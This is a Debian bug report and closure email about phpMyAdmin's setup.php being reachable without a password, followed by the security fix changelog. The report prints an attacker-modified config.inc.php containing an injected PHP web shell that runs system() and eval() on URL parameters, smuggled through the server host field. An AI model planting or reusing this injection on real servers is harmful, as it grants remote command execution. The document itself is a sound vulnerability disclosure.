Your message dated Sun, 25 Oct 2009 19:57:50 +0000
with message-id <[email protected]>
and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13
has caused the Debian Bug report #543460,
regarding phpmyadmin: No password protection for setup.php script
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole
After install, you can access http://{host}/phpmyadmin/scripts/setup.php
without entering any password.
By adding a new host in the configuration, an attacker can submit malicius code
to execute commands as
www-data user.
This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
-- System Information:
Debian Release: 4.0
APT prefers oldstable
APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy
ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti
ii perl 5.8.8-7etch6 Larry Wall's Practical Extraction
ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5
ii ucf 2.0020 Update Configuration File: preserv
Versions of packages phpmyadmin recommends:
ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD
pn php5-gd | php4-gd <none> (no description available)
pn php5-mcrypt | php4-mcrypt <none> (no description available)
-- debconf information:
phpmyadmin/setup-username: admin
phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.9.1.1-13
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_2.9.1.1-13.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz
phpmyadmin_2.9.1.1-13.dsc
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc
phpmyadmin_2.9.1.1-13_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thijs Kinkhorst <[email protected]> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sun, 25 Oct 2009 12:25:47 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.9.1.1-13
Distribution: oldstable-security
Urgency: high
Maintainer: Thijs Kinkhorst <[email protected]>
Changed-By: Thijs Kinkhorst <[email protected]>
Description:
phpmyadmin - Administrate MySQL over the WWW
Closes: 535044 543460 552194
Changes:
phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low
.
* Fix inverted logic in documentation of new script.
.
phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high
.
* Upload to oldstable to fix security issues.
* Cross site scripting (CVE-2009-3696, closes: #552194).
* Allow saving of configuration from setup script only after
explicit action from administrator (closes: #535044, #543460).
Files:
0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc
68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz
85eaa36525db64fdd0ba9955c9def399 3605314 web extra
phpmyadmin_2.9.1.1-13_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJK5DbCAAoJECIIoQCMVaAcnqQIAJYA79w/IdQftDzenAXzRv41
YGmyo3SA0X3e76VeLdUstXJa+JvT5uKZNRVx3sh9s+HfIdETKKhNb1pkdla/RmZ1
X55bYpF8HIavS2tJcRaCn9E5txJs5epgz0bd2Mg1uhp3Y07EnbCAR19VG7nqIj87
HPT3CU/i5Y/0GO+JrWPt6Mh59TySEXzCHnDuSpPZUBMWxS5RgyQ7qjIu6HaStixv
IhMl1h4PKD05bwJ2fszHfbXEcP1wW+rQSslWjk3jJyuIGzJ7ES7lhSk6NGzAY8GV
2gUOOoq8aqWRbM1lU8sK+Qfj9lAyKhb1SdGBDky+MnEukId2ANwKZX082J+X/+M=
=DeBv
-----END PGP SIGNATURE-----
--- End Message ---